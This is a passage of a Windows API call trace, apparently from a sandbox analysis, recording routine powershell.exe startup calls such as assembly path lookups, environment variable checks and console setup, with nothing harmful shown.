ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0072.168] SetErrorMode (uMode=0x1) returned 0x1 [0072.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.423] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0072.423] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.423] CoTaskMemFree (pv=0x3e46f0) [0072.427] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0072.427] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.427] CoTaskMemFree (pv=0x3e46f0) [0072.428] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0072.428] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.428] CoTaskMemFree (pv=0x3e46f0) [0072.432] CoCreateGuid (in: pguid=0x1addc8 | out: pguid=0x1addc8*(Data1=0x39dd9946, Data2=0xc998, Data3=0x476c, Data4=([0]=0xb4, [1]=0xca, [2]=0x7d, [3]=0x25, [4]=0x10, [5]=0x82, [6]=0x8e, [7]=0x72))) returned 0x0 [0072.437] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0072.437] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.437] CoTaskMemFree (pv=0x3e46f0) [0072.441] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0072.441] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.441] CoTaskMemFree (pv=0x3e46f0) [0072.445] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0072.445] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.445] CoTaskMemFree (pv=0x3e46f0) [0072.453] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0072.455] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1ada70 | out: lpConsoleScreenBufferInfo=0x1ada70) returned 1 [0072.461] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0072.462] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1ada70 | out: lpConsoleScreenBufferInfo=0x1ada70) returned 1 [0072.463] GetVersionExW (in: lpVersionInformation=0x1ada00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ada00*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0072.466] GetCurrentProcess () returned 0xffffffffffffffff [0072.468] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1ada98 | out: TokenHandle=0x1ada98*=0x334) returned 1 [0072.472] GetTokenInformation (in: TokenHandle=0x334, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ad9b8 | out: TokenInformation=0x0, ReturnLength=0x1ad9b8) returned 0 [0072.474] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3ea7e0 [0072.474] GetTokenInformation (in: TokenHandle=0x334, TokenInformationClass=0x8, TokenInformation=0x3ea7e0, TokenInformationLength=0x4, ReturnLength=0x1ad9b8 | out: TokenInformation=0x3ea7e0, ReturnLength=0x1ad9b8) returned 1 [0072.478] DuplicateTokenEx (in: hExistingToken=0x334, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1adb18 | out: phNewToken=0x1adb18*=0x330) returned 1 [0072.479] GetTokenInformation (in: TokenHandle=0x334, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ad9b8 | out: TokenInformation=0x0, ReturnLength=0x1ad9b8) returned 0 [0072.479] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3ea810 [0072.479] GetTokenInformation (in: TokenHandle=0x334, TokenInformationClass=0x8, TokenInformation=0x3ea810, TokenInformationLength=0x4, ReturnLength=0x1ad9b8 | out: TokenInformation=0x3ea810, ReturnLength=0x1ad9b8) returned 1 [0072.480] CheckTokenMembership (in: TokenHandle=0x330, SidToCheck=0x2dfff20*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1adb28 | out: IsMember=0x1adb28) returned 1 [0072.480] CloseHandle (hObject=0x330) returned 1 [0072.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.546] CoTaskMemAlloc (cb=0x804) returned 0x1b3c5080 [0072.546] GetConsoleTitleW (in: lpConsoleTitle=0x1b3c5080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39 [0072.546] CoTaskMemFree (pv=0x1b3c5080) [0072.629] CoTaskMemAlloc (cb=0x804) returned 0x1b3c5e70 [0072.629] GetConsoleTitleW (in: lpConsoleTitle=0x1b3c5e70, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39 [0072.630] CoTaskMemFree (pv=0x1b3c5e70) [0072.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.633] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0072.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0072.813] SetConsoleCtrlHandler (HandlerRoutine=0x2ac68dc, Add=1) returned 1 [0072.824] GetStdHandle (nStdHandle=0xfffffff6) returned 0xe4 [0072.827] GetConsoleCP () returned 0x1b5 [0072.844] GetFileType (hFile=0xe4) returned 0x3 [0072.884] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c [0072.886] CoCreateGuid (in: pguid=0x1adc10 | out: pguid=0x1adc10*(Data1=0xc06ddaa0, Data2=0x39f7, Data3=0x4c26, Data4=([0]=0xb3, [1]=0x1, [2]=0xaf, [3]=0x6f, [4]=0xd8, [5]=0xa4, [6]=0x2c, [7]=0xf3))) returned 0x0 [0072.888] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0072.888] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.888] CoTaskMemFree (pv=0x3e46f0) [0072.922] WinSqmIsOptedIn () returned 0x0 [0072.923] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0072.923] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.923] CoTaskMemFree (pv=0x3e46f0) [0072.926] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0072.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.926] CoTaskMemFree (pv=0x3e46f0) [0072.928] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0072.928] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.928] CoTaskMemFree (pv=0x3e46f0) [0072.930] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0072.930] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.930] CoTaskMemFree (pv=0x3e46f0) [0072.932] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0072.932] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.932] CoTaskMemFree (pv=0x3e46f0) [0072.951] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0072.951] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.951] CoTaskMemFree (pv=0x3e46f0) [0072.954] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0072.954] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.954] CoTaskMemFree (pv=0x3e46f0) [0072.956] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0072.956] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.956] CoTaskMemFree (pv=0x3e46f0) [0072.967] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0072.967] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.967] CoTaskMemFree (pv=0x3e46f0) [0072.975] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0072.976] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.976] CoTaskMemFree (pv=0x3e46f0) [0072.978] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0072.978] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.978] CoTaskMemFree (pv=0x3e46f0) [0072.979] CoTaskMemAlloc (cb=0x104) returned 0x3e46f0 [0072.979] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e46f0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0072.979] CoTaskMemFree (pv=0x3e46f0) [0073.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 